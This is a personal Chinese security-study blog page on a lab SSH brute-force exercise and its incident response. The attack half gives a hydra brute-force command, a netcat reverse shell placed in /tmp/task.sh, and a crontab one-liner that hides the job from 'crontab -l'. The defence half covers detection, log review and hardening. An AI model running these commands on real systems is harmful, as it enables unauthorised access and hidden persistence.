<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>tyc的小窝</title>
  <meta name="keywords" content="">
  <meta name="description" content="tyc的小窝">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="小迪安全基础入门名词解释web应用框架常规的Web应用搭建 购买云服务器，购买域名  HTTP 请求头各参数具体含义​			HTTP的头域包括通用头、请求头、响应头和实体头四个部分。每个头域由一个域名，冒号（:）和域值三部分组成。 ​			通用头部：是客户端和服务器都可以使用的头部，可以在客户端、服务器和其他应用程序之间提供一些非常有用的通用功能，如Date头部。​			请求头部：是请求报文特有的">
<meta property="og:type" content="article">
<meta property="og:title" content="tyc的小窝">
<meta property="og:url" content="http://example.com/2024/03/28/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/index.html">
<meta property="og:site_name" content="tyc的小窝">
<meta property="og:description" content="小迪安全基础入门名词解释web应用框架常规的Web应用搭建 购买云服务器，购买域名  HTTP 请求头各参数具体含义​			HTTP的头域包括通用头、请求头、响应头和实体头四个部分。每个头域由一个域名，冒号（:）和域值三部分组成。 ​			通用头部：是客户端和服务器都可以使用的头部，可以在客户端、服务器和其他应用程序之间提供一些非常有用的通用功能，如Date头部。​			请求头部：是请求报文特有的">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-03-28T05:19:32.752Z">
<meta property="article:modified_time" content="2024-03-28T14:36:06.688Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>John Doe</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="facebook"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-facebook"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="reddit"
               href="https://www.reddit.com/user/yelog/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-reddit"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="weibo"
               href="http://weibo.com/u/2307534817"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-weibo"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="jianshu"
               href="https://www.jianshu.com/u/ff56736de7cf"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-jianshu"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/people/jaytp/activities"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:jaytp@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=872336115&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="kugou"
               href="https://www.kugou.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-kugou"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="neteasemusic"
               href="https://music.163.com/#/user/home?id=88151013"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-neteasemusic"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(20)</small>
            
        </div>
    </li>
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="20">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="All "
           href="/2024/03/28/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-28 13:19:32">2024/03/28</span>
        </a>
        
        
        <a  class="All "
           href="/2024/03/27/vim/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-27 14:16:22">2024/03/27</span>
        </a>
        
        
        <a  class="All "
           href="/2024/03/25/%E9%98%B2%E7%81%AB%E5%A2%99/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-25 23:12:18">2024/03/25</span>
        </a>
        
        
        <a  class="All "
           href="/2024/03/23/docker/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-23 18:12:23">2024/03/23</span>
        </a>
        
        
        <a  class="All "
           href="/2023/12/22/java/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-12-22 15:33:09">2023/12/22</span>
        </a>
        
        
        <a  class="All "
           href="/2023/11/05/%E9%99%87%E5%89%91%E6%9D%AF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-11-05 22:25:24">2023/11/05</span>
        </a>
        
        
        <a  class="All "
           href="/2023/11/05/%E9%B9%8F%E7%A8%8B%E6%9D%AFmisc/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-11-05 16:23:25">2023/11/05</span>
        </a>
        
        
        <a  class="All "
           href="/2023/11/05/hexo%E8%BF%81%E7%A7%BB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-11-05 15:50:09">2023/11/05</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/28/web%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-28 17:31:11">2023/09/28</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/27/misc/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-27 16:21:55">2023/09/27</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/21/%E9%9A%8F%E7%AC%94/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-21 13:54:35">2023/09/21</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/08/win%E7%AB%AF%E5%8F%A3%E5%8D%A0%E7%94%A8%E6%9F%A5%E8%AF%A2/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-08 15:32:06">2023/09/08</span>
        </a>
        
        
        <a  class="All "
           href="/2023/08/09/%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%88Mysql)/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-08-09 18:49:11">2023/08/09</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/26/%E6%8A%A4%E7%BD%91%E8%A1%8C%E5%8A%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-07-26 21:28:45">2023/07/26</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/26/linux%E7%B3%BB%E7%BB%9F%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-07-26 21:28:34">2023/07/26</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/22/%E7%88%AC%E8%99%AB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-07-22 23:06:24">2023/07/22</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/%E5%AF%86%E7%A0%81/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/pwn/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/Metasploit%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%A1%86%E6%9E%B6%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/Crypto%E5%BA%93/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-护网行动" class="article article-type-post" itemscope itemprop="blogPost">
    
    <div class="article-meta">
        
        
        
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2024-03-23 10:19:03'>2023-07-26 21:28</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8A%A4%E7%BD%91%E8%A1%8C%E5%8A%A8"><span class="toc-text">护网行动</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ssh"><span class="toc-text">ssh</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80-ssh%E6%98%AF%E4%BB%80%E4%B9%88"><span class="toc-text">一.ssh是什么</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C-%E5%B8%B8%E8%A7%81%E7%AB%AF%E5%8F%A3%E5%AF%B9%E5%BA%94%E7%9A%84%E6%9C%8D%E5%8A%A1"><span class="toc-text">二.常见端口对应的服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89-SSH%E7%88%86%E7%A0%B4"><span class="toc-text">三.SSH爆破</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">1.信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E7%88%86%E7%A0%B4SSH"><span class="toc-text">2.爆破SSH</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-SSH%E7%99%BB%E5%BD%95"><span class="toc-text">3.SSH登录</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-%E5%B0%9D%E8%AF%95%E5%88%9B%E5%BB%BA%E9%9A%90%E8%97%8F%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%EF%BC%88%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%EF%BC%89"><span class="toc-text">4.尝试创建隐藏计划任务（权限维持）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-%E5%B0%9D%E8%AF%95nc%E8%BF%9E%E6%8E%A5%E7%9B%AE%E6%A0%87%E4%B8%BB%E6%9C%BA%E7%9A%84shell"><span class="toc-text">5.尝试nc连接目标主机的shell</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9B-SSH%E7%AB%AF%E5%8F%A3%E7%88%86%E7%A0%B4%E7%9A%84%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E6%96%B9%E6%A1%88"><span class="toc-text">四.SSH端口爆破的应急响应方案</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BA%8B%E4%BB%B6%E6%8E%92%E6%9F%A5"><span class="toc-text">事件排查</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E6%9F%A5%E7%9C%8B%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5%E7%9A%84%E6%83%85%E5%86%B5"><span class="toc-text">1.查看网络连接的情况</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-%E6%9F%A5%E7%9C%8B%E5%AE%88%E6%8A%A4%E8%BF%9B%E7%A8%8B"><span class="toc-text">2.查看守护进程</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-%E6%9F%A5%E7%9C%8B%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="toc-text">3.查看计划任务</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4-%E6%89%BE%E5%88%B0task-sh-%E6%96%87%E4%BB%B6"><span class="toc-text">4.找到task.sh 文件</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BA%AF%E6%BA%90%E5%88%86%E6%9E%90"><span class="toc-text">溯源分析</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E5%88%86%E6%9E%90%E4%BB%BB%E5%8A%A1%E6%96%87%E4%BB%B6-task-sh"><span class="toc-text">1.分析任务文件 task.sh</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%EF%BC%881%EF%BC%89%E6%9F%A5%E7%9C%8B%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%97%B6%E9%97%B4%EF%BC%9Als-l-x2F-tmp-x2F-task-sh"><span class="toc-text">（1）查看文件上传时间：ls -l &#x2F;tmp&#x2F;task.sh</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%EF%BC%882%EF%BC%89%E6%9F%A5%E7%9C%8B%E7%99%BB%E5%BD%95%E6%97%A5%E5%BF%97"><span class="toc-text">（2）查看登录日志</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%EF%BC%883%EF%BC%89%E6%80%BB%E7%BB%93"><span class="toc-text">（3）总结</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BA%8B%E4%BB%B6%E5%A4%84%E7%BD%AE"><span class="toc-text">事件处置</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E5%88%A0%E9%99%A4%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%EF%BC%8C%E7%BB%93%E6%9D%9F%E5%BC%82%E5%B8%B8%E8%BF%9B%E7%A8%8B"><span class="toc-text">1.删除计划任务，结束异常进程</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-%E5%88%A0%E9%99%A4%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6"><span class="toc-text">2.删除恶意文件</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-%E4%BF%AE%E6%94%B9%E5%AF%86%E7%A0%81%EF%BC%8C%E5%85%B3%E9%97%ADroot%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%BF%9E%E6%8E%A5%E7%9A%84%E6%9D%83%E9%99%90"><span class="toc-text">3.修改密码，关闭root用户远程连接的权限</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4-%E4%BF%AE%E6%94%B9ssh%E9%BB%98%E8%AE%A4%E7%AB%AF%E5%8F%A3"><span class="toc-text">4.修改ssh默认端口</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8B%92%E7%B4%A2%E7%97%85%E6%AF%92"><span class="toc-text">勒索病毒</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80-%E7%AE%80%E4%BB%8B"><span class="toc-text">一.简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C-%E6%A8%A1%E6%8B%9F%E6%94%BB%E5%87%BB"><span class="toc-text">二.模拟攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E7%94%A8nmap%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E6%A8%A1%E5%BC%8F"><span class="toc-text">1.用nmap的漏洞扫描模式</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E6%89%93%E5%BC%80metasploit"><span class="toc-text">2.打开metasploit</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-%E6%90%9C%E7%B4%A2ms17-010%E7%9B%B8%E5%85%B3%E6%A8%A1%E5%9D%97"><span class="toc-text">3.搜索ms17-010相关模块</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-%E5%8A%A0%E8%BD%BD%E6%89%AB%E6%8F%8F%E6%A8%A1%E5%9D%97"><span class="toc-text">4.加载扫描模块</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-%E6%9F%A5%E7%9C%8B%E9%85%8D%E7%BD%AE%E9%80%89%E9%A1%B9"><span class="toc-text">5.查看配置选项</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-%E9%85%8D%E7%BD%AE%E7%9B%AE%E6%A0%87%E4%B8%BB%E6%9C%BA"><span class="toc-text">6.配置目标主机</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#7-%E5%BC%80%E5%A7%8B%E6%89%AB%E6%8F%8F%E6%BC%8F%E6%B4%9E%EF%BC%8C%E5%86%8D%E6%AC%A1%E8%AF%81%E5%AE%9E%E9%9D%B6%E6%9C%BA%E5%AD%98%E5%9C%A8MS17-010%E6%BC%8F%E6%B4%9E"><span class="toc-text">7.开始扫描漏洞，再次证实靶机存在MS17-010漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#8-%E4%BD%BF%E7%94%A8%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9D%97%EF%BC%9Aexploit-x2F-windows-x2F-smb-x2F-ms17-010-eternalblue"><span class="toc-text">8.使用永恒之蓝攻击模块：exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#9-%E6%9F%A5%E7%9C%8B%E9%80%89%E9%A1%B9%E5%B9%B6%E8%AE%BE%E7%BD%AErhosts"><span class="toc-text">9.查看选项并设置rhosts</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#10-%E6%94%BB%E5%87%BB"><span class="toc-text">10.攻击</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#11-%E4%B8%8A%E4%BC%A0"><span class="toc-text">11.上传</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94"><span class="toc-text">三.应急响应</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1"><span class="toc-text">1.</span></a></li></ol></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="护网行动"><a href="#护网行动" class="headerlink" title="护网行动"></a>护网行动</h1><h2 id="ssh"><a href="#ssh" class="headerlink" title="ssh"></a>ssh</h2><h3 id="一-ssh是什么"><a href="#一-ssh是什么" class="headerlink" title="一.ssh是什么"></a>一.ssh是什么</h3><p>​         安全外壳协议：ssh  一种加密的网络传输协议</p>
<p>​		用途：远程登陆系统</p>
<p>​		xshell    	</p>
<h3 id="二-常见端口对应的服务"><a href="#二-常见端口对应的服务" class="headerlink" title="二.常见端口对应的服务"></a>二.常见端口对应的服务</h3><p>22         ssh</p>
<p>445       smb   (著名漏洞：ms17-010 永恒之蓝)</p>
<p>3306     MySQL</p>
<p>3389	 rdp远程桌面连接服务</p>
<p>80		  http</p>
<p>443		https</p>
<h3 id="三-SSH爆破"><a href="#三-SSH爆破" class="headerlink" title="三.SSH爆破"></a>三.SSH爆破</h3><h4 id="1-信息收集"><a href="#1-信息收集" class="headerlink" title="1.信息收集"></a>1.信息收集</h4><p>使用nmap扫描目标主机端口：nmap + ip</p>
<h4 id="2-爆破SSH"><a href="#2-爆破SSH" class="headerlink" title="2.爆破SSH"></a>2.爆破SSH</h4><p>​	使用hydra(九头蛇）进行爆破</p>
<p>​	hydra -L users.txt -P password.txt  ssh:&#x2F;&#x2F;ip</p>
<h4 id="3-SSH登录"><a href="#3-SSH登录" class="headerlink" title="3.SSH登录"></a>3.SSH登录</h4><p>ssh 用户名@ip</p>
<h4 id="4-尝试创建隐藏计划任务（权限维持）"><a href="#4-尝试创建隐藏计划任务（权限维持）" class="headerlink" title="4.尝试创建隐藏计划任务（权限维持）"></a>4.尝试创建隐藏计划任务（权限维持）</h4><p>​	进入 &#x2F;tmp 目录创建 task.sh 文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/bin/bash</span></span><br><span class="line">nc ip 端口（<span class="number">7777</span>） -e /bin /bash</span><br></pre></td></tr></table></figure>

<p>​	创建create_task.sh</p>
<p>​	</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(crontab -l;printf <span class="string">&quot;* * * * * /tmp/task.sh;\rno crontw-web for `whoami`%100c\n&quot;</span>)|crontab -</span><br></pre></td></tr></table></figure>

<h4 id="5-尝试nc连接目标主机的shell"><a href="#5-尝试nc连接目标主机的shell" class="headerlink" title="5.尝试nc连接目标主机的shell"></a>5.尝试nc连接目标主机的shell</h4><p>​			nc -lvp 7777</p>
<h3 id="四-SSH端口爆破的应急响应方案"><a href="#四-SSH端口爆破的应急响应方案" class="headerlink" title="四.SSH端口爆破的应急响应方案"></a>四.SSH端口爆破的应急响应方案</h3><h4 id="事件排查"><a href="#事件排查" class="headerlink" title="事件排查"></a>事件排查</h4><h5 id="1-查看网络连接的情况"><a href="#1-查看网络连接的情况" class="headerlink" title="1.查看网络连接的情况"></a>1.查看网络连接的情况</h5><p>​     netstat -antpl  </p>
<p>​	发现异常连接               &#x2F;bash</p>
<h5 id="2-查看守护进程"><a href="#2-查看守护进程" class="headerlink" title="2.查看守护进程"></a>2.查看守护进程</h5><p>​	查看进程树：pstree -p</p>
<p>​	查看进程：systemctl status pid</p>
<p>​	发现计划任务</p>
<h5 id="3-查看计划任务"><a href="#3-查看计划任务" class="headerlink" title="3.查看计划任务"></a>3.查看计划任务</h5><p>​	crontab -l : 未发现有计划任务，可能是隐藏计划任务</p>
<p>​	查看 &#x2F;var&#x2F;spool&#x2F;cron&#x2F;crontabs 下的任务</p>
<p>​	使用 cat -A root 或者 cat -vET root :可以看到隐藏内容或者vim root ：直接编辑也可以看到具体任务内容</p>
<h5 id="4-找到task-sh-文件"><a href="#4-找到task-sh-文件" class="headerlink" title="4.找到task.sh 文件"></a>4.找到task.sh 文件</h5><p>​	ls -l &#x2F;tmp&#x2F;task.sh :查看文件上传时间</p>
<p>​	cat &#x2F;tmp&#x2F;task.sh :查看文件内容，发现是通过nc 反弹shell</p>
<h4 id="溯源分析"><a href="#溯源分析" class="headerlink" title="溯源分析"></a>溯源分析</h4><h5 id="1-分析任务文件-task-sh"><a href="#1-分析任务文件-task-sh" class="headerlink" title="1.分析任务文件 task.sh"></a>1.分析任务文件 task.sh</h5><h6 id="（1）查看文件上传时间：ls-l-x2F-tmp-x2F-task-sh"><a href="#（1）查看文件上传时间：ls-l-x2F-tmp-x2F-task-sh" class="headerlink" title="（1）查看文件上传时间：ls -l &#x2F;tmp&#x2F;task.sh"></a>（1）查看文件上传时间：ls -l &#x2F;tmp&#x2F;task.sh</h6><p>​	   发现权限为root，说明攻击者以root账号登陆，很可能root账号密码被爆破</p>
<h6 id="（2）查看登录日志"><a href="#（2）查看登录日志" class="headerlink" title="（2）查看登录日志"></a>（2）查看登录日志</h6><p>​		last -f &#x2F;var&#x2F;log&#x2F;wtmp  :  kali下登陆成功的日志</p>
<p>​		last -f &#x2F;var&#x2F;log&#x2F;btmp  :   kali下登录失败的日志，发现大量登录失败的日志</p>
<h6 id="（3）总结"><a href="#（3）总结" class="headerlink" title="（3）总结"></a>（3）总结</h6><p>​			爆破时间</p>
<p>​			爆破账户</p>
<p>​			攻击者ip</p>
<p>​			成功爆破出系统的root账户密码，并且留crontab隐藏后门，任务执行文件task.sh</p>
<h4 id="事件处置"><a href="#事件处置" class="headerlink" title="事件处置"></a>事件处置</h4><h5 id="1-删除计划任务，结束异常进程"><a href="#1-删除计划任务，结束异常进程" class="headerlink" title="1.删除计划任务，结束异常进程"></a>1.删除计划任务，结束异常进程</h5><p>​		删除隐藏计划任务：crontab -r -u root</p>
<p>​		杀掉恶意进程： kill pid</p>
<h5 id="2-删除恶意文件"><a href="#2-删除恶意文件" class="headerlink" title="2.删除恶意文件"></a>2.删除恶意文件</h5><p>​		rm  文件名</p>
<h5 id="3-修改密码，关闭root用户远程连接的权限"><a href="#3-修改密码，关闭root用户远程连接的权限" class="headerlink" title="3.修改密码，关闭root用户远程连接的权限"></a>3.修改密码，关闭root用户远程连接的权限</h5><p>​		修改密码 ： passwd root</p>
<p>​		关闭root用户远程连接的权限： vim &#x2F;etc&#x2F;ssh&#x2F;sshd_config  : 修改PermitRootLogin为no，增强权限控制</p>
<h5 id="4-修改ssh默认端口"><a href="#4-修改ssh默认端口" class="headerlink" title="4.修改ssh默认端口"></a>4.修改ssh默认端口</h5><p>​		vim &#x2F;etc&#x2F;ssh&#x2F;sshd_config</p>
<p>​		将22端口修改成其他端口，并将#删除</p>
